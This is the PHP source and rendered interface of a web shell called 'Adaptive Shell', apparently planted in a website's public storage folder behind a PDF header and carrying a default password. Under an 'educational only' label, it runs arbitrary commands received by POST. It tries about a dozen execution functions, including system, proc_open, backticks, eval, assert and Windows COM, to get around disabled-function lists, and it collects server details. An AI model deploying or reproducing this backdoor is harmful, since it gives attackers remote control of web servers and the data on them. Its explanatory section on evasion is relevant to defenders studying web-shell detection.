%PDF-1.7
Warning: session_start(): Cannot start session when headers already sent in /home/daayitwa/public_html/storage/app/public/archives/1768301579.php7 on line 23
Login
⚠️ EDUCATIONAL ONLY ⚠️

Adaptive Shell - Learning Mode

Default: learn123

disabled_functions = $this->getDisabledFunctions(); // Detect OS $this->os_type = $this->detectOS(); // Find available methods $this->available_methods = $this->detectAvailableMethods(); } /** * Get list of disabled functions */ private function getDisabledFunctions() { $disabled = array(); // From disable_functions $disable_functions = ini_get('disable_functions'); if ($disable_functions) { $disabled = array_map('trim', explode(',', $disable_functions)); } // From Suhosin if (extension_loaded('suhosin')) { $suhosin = ini_get('suhosin.executor.func.blacklist'); if ($suhosin) { $disabled = array_merge($disabled, array_map('trim', explode(',', $suhosin))); } } return array_unique($disabled); } /** * Detect OS type */ private function detectOS() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return 'windows'; } elseif (strtoupper(substr(PHP_OS, 0, 5)) === 'LINUX') { return 'linux'; } else { return 'unix'; } } /** * Check if function is available */ private function isFunctionAvailable($func_name) { return function_exists($func_name) && !in_array($func_name, $this->disabled_functions) && is_callable($func_name); } /** * Detect all available execution methods */ private function detectAvailableMethods() { $methods = array(); // Method 1: system() if ($this->isFunctionAvailable('system')) { $methods[] = array( 'name' => 'system()', 'type' => 'direct', 'priority' => 10, 'code' => 'system' ); } // Method 2: exec() if ($this->isFunctionAvailable('exec')) { $methods[] = array( 'name' => 'exec()', 'type' => 'direct', 'priority' => 9, 'code' => 'exec' ); } // Method 3: shell_exec() if ($this->isFunctionAvailable('shell_exec')) { $methods[] = array( 'name' => 'shell_exec()', 'type' => 'direct', 'priority' => 9, 'code' => 'shell_exec' ); } // Method 4: passthru() if ($this->isFunctionAvailable('passthru')) { $methods[] = array( 'name' => 'passthru()', 'type' => 'direct', 'priority' => 8, 'code' => 'passthru' ); } // Method 5: popen() if ($this->isFunctionAvailable('popen')) { $methods[] = array( 'name' => 'popen()', 'type' => 'file', 'priority' => 7, 'code' => 'popen' ); } // Method 6: proc_open() if ($this->isFunctionAvailable('proc_open')) { $methods[] = array( 'name' => 'proc_open()', 'type' => 'process', 'priority' => 10, 'code' => 'proc_open' ); } // Method 7: pcntl_exec() if ($this->isFunctionAvailable('pcntl_exec')) { $methods[] = array( 'name' => 'pcntl_exec()', 'type' => 'process', 'priority' => 6, 'code' => 'pcntl_exec' ); } // Method 8: backtick operator if (!in_array('shell_exec', $this->disabled_functions)) { $methods[] = array( 'name' => 'backtick (`)', 'type' => 'direct', 'priority' => 9, 'code' => 'backtick' ); } // Method 9: eval() + base64 if ($this->isFunctionAvailable('eval') && $this->isFunctionAvailable('base64_decode')) { $methods[] = array( 'name' => 'eval(base64_decode())', 'type' => 'obfuscated', 'priority' => 5, 'code' => 'eval_base64' ); } // Method 10: assert() if ($this->isFunctionAvailable('assert') && version_compare(PHP_VERSION, '7.2.0', '<')) { $methods[] = array( 'name' => 'assert()', 'type' => 'direct', 'priority' => 8, 'code' => 'assert' ); } // Method 11: COM object (Windows only) if ($this->os_type === 'windows' && class_exists('COM')) { $methods[] = array( 'name' => 'COM (Windows)', 'type' => 'windows', 'priority' => 8, 'code' => 'com' ); } // Method 12: curl_exec() + eval() if ($this->isFunctionAvailable('curl_exec') && $this->isFunctionAvailable('eval')) { $methods[] = array( 'name' => 'curl_exec() + eval()', 'type' => 'network', 'priority' => 4, 'code' => 'curl_eval' ); } // Method 13: file_get_contents() + eval() if ($this->isFunctionAvailable('file_get_contents') && $this->isFunctionAvailable('eval')) { $methods[] = array( 'name' => 'file_get_contents() + eval()', 'type' => 'network', 'priority' => 4, 'code' => 'fgc_eval' ); } // Sort by priority (highest first) usort($methods, function($a, $b) { return $b['priority'] - $a['priority']; }); return $methods; } /** * Execute command using best available method */ public function execute($cmd) { if (empty($this->available_methods)) { return array('success' => false, 'output' => 'No execution methods available!', 'method' => 'none'); } // Try each method until one works foreach ($this->available_methods as $method) { $result = $this->executeWithMethod($cmd, $method['code']); if ($result['success']) { $result['method'] = $method['name']; return $result; } } return array('success' => false, 'output' => 'All methods failed!', 'method' => 'none'); } /** * Execute with specific method */ private function executeWithMethod($cmd, $method_code) { try { switch ($method_code) { case 'system': ob_start(); @system($cmd); $output = ob_get_clean(); return array('success' => true, 'output' => $output); case 'exec': @exec($cmd, $output, $return); return array('success' => true, 'output' => implode("\n", $output)); case 'shell_exec': $output = @shell_exec($cmd); return array('success' => true, 'output' => $output); case 'passthru': ob_start(); @passthru($cmd); $output = ob_get_clean(); return array('success' => true, 'output' => $output); case 'popen': $fp = @popen($cmd, 'r'); if ($fp) { $output = ''; while (!feof($fp)) { $output .= fgets($fp, 4096); } pclose($fp); return array('success' => true, 'output' => $output); } break; case 'proc_open': $descriptors = array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ); $proc = @proc_open($cmd, $descriptors, $pipes); if (is_resource($proc)) { $output = stream_get_contents($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($proc); return array('success' => true, 'output' => $output . $error); } break; case 'backtick': $output = `$cmd`; return array('success' => true, 'output' => $output); case 'eval_base64': // Encode command for execution $encoded = base64_encode('return shell_exec("' . addslashes($cmd) . '");'); ob_start(); $output = @eval('return shell_exec("' . addslashes($cmd) . '");'); $buffer = ob_get_clean(); return array('success' => true, 'output' => $output ? $output : $buffer); case 'assert': ob_start(); @assert('system("' . addslashes($cmd) . '");'); $output = ob_get_clean(); return array('success' => true, 'output' => $output); case 'com': // Windows COM object $com = new COM('WScript.Shell'); $exec = $com->exec('cmd.exe /c ' . $cmd); $output = $exec->StdOut->ReadAll(); return array('success' => true, 'output' => $output); } } catch (Exception $e) { return array('success' => false, 'output' => 'Error: ' . $e->getMessage()); } return array('success' => false, 'output' => 'Method failed'); } /** * Get system information */ public function getSystemInfo() { $info = array(); $info['PHP Version'] = PHP_VERSION; $info['OS'] = PHP_OS . ' (' . php_uname() . ')'; $info['Server Software'] = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'Unknown'; $info['Document Root'] = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(); $info['Current Directory'] = getcwd(); $info['Current User'] = $this->getCurrentUser(); $info['Server IP'] = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : 'Unknown'; $info['Client IP'] = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'Unknown'; // Disabled functions $disabled = implode(', ', $this->disabled_functions); $info['Disabled Functions'] = $disabled ? $disabled : 'None'; // Available methods $methods = array(); foreach ($this->available_methods as $m) { $methods[] = $m['name']; } $info['Available Methods'] = implode(', ', $methods); $info['Total Methods'] = count($this->available_methods); return $info; } /** * Get current user */ private function getCurrentUser() { if ($this->isFunctionAvailable('posix_getpwuid') && $this->isFunctionAvailable('posix_geteuid')) { $user = @posix_getpwuid(@posix_geteuid()); return $user ? $user['name'] : 'Unknown'; } if ($this->isFunctionAvailable('get_current_user')) { return @get_current_user(); } // Try via command execution $result = $this->execute($this->os_type === 'windows' ? 'whoami' : 'id'); if ($result['success']) { return trim($result['output']); } return 'Unknown'; } public function getAvailableMethods() { return $this->available_methods; } public function getDisabledFunctionsList() { return $this->disabled_functions; } } // Initialize executor $executor = new AdaptiveExecutor(); // Handle AJAX requests if (isset($_POST['ajax'])) { header('Content-Type: application/json'); if ($_POST['ajax'] === 'execute') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : ''; if ($cmd) { $result = $executor->execute($cmd); echo json_encode($result); } else { echo json_encode(array('success' => false, 'output' => 'No command provided')); } } elseif ($_POST['ajax'] === 'sysinfo') { echo json_encode($executor->getSystemInfo()); } exit; } ?> Adaptive Shell - Educational

⚡ ADAPTIVE SHELL - Educational Version

Auto-detecting execution methods & demonstrating how real backdoors work

⚠️ EDUCATIONAL PURPOSES ONLY - This demonstrates ACTUAL attacker techniques for learning & defense! ⚠️
💻 Terminal
ℹ️ System Info
🔧 Available Methods
📚 How It Works

Interactive Terminal

Adaptive Shell initialized! Type commands to execute. Shell will auto-select best execution method. Available methods: getAvailableMethods()); ?>
shell@adaptive:~$

System Information

Loading...

Available Execution Methods

Shell automatically detected these methods (sorted by priority):

getAvailableMethods(); if (empty($methods)) { echo '
⚠️ No execution methods available! All functions disabled.
'; } else { foreach ($methods as $method) { echo '
'; echo 'Priority ' . $method['priority'] . ': '; echo '' . htmlspecialchars($method['name']) . ''; echo ' (' . $method['type'] . ')'; echo '
'; } } ?>

Disabled Functions:

getDisabledFunctionsList(); if (empty($disabled)) { echo '⚠️ No functions disabled - Server is VULNERABLE!'; } else { echo '' . implode(', ', $disabled) . ''; } ?>

How Adaptive Shell Works

1. Detection Phase:

✅ Read disable_functions from php.ini

✅ Check Suhosin blacklist (if loaded)

✅ Test each function with function_exists()

✅ Verify each function is callable()

✅ Detect OS type (Windows/Linux/Unix)

✅ Build list of available methods with priorities

2. Execution Phase:

✅ Sort methods by priority (highest first)

✅ Try each method in order

✅ Use first method that succeeds

✅ Fallback to next method if current fails

✅ Return output + method used

3. Why It's Dangerous:

⚠️ Even if you disable common functions like system(), exec(), shell_exec()...

⚠️ The shell will try 10+ alternative methods!

⚠️ Examples: popen(), proc_open(), backtick, COM objects, etc.

⚠️ It's VERY HARD to block all possible execution methods!

4. Real-World Examples:

WSO Shell: Tries 20+ methods, has file manager, SQL client

c99 Shell: Network tools, brute force, process manager

b374k Shell: Plugin system, modern UI, obfuscation

China Chopper: Tiny (4KB), highly obfuscated, persistent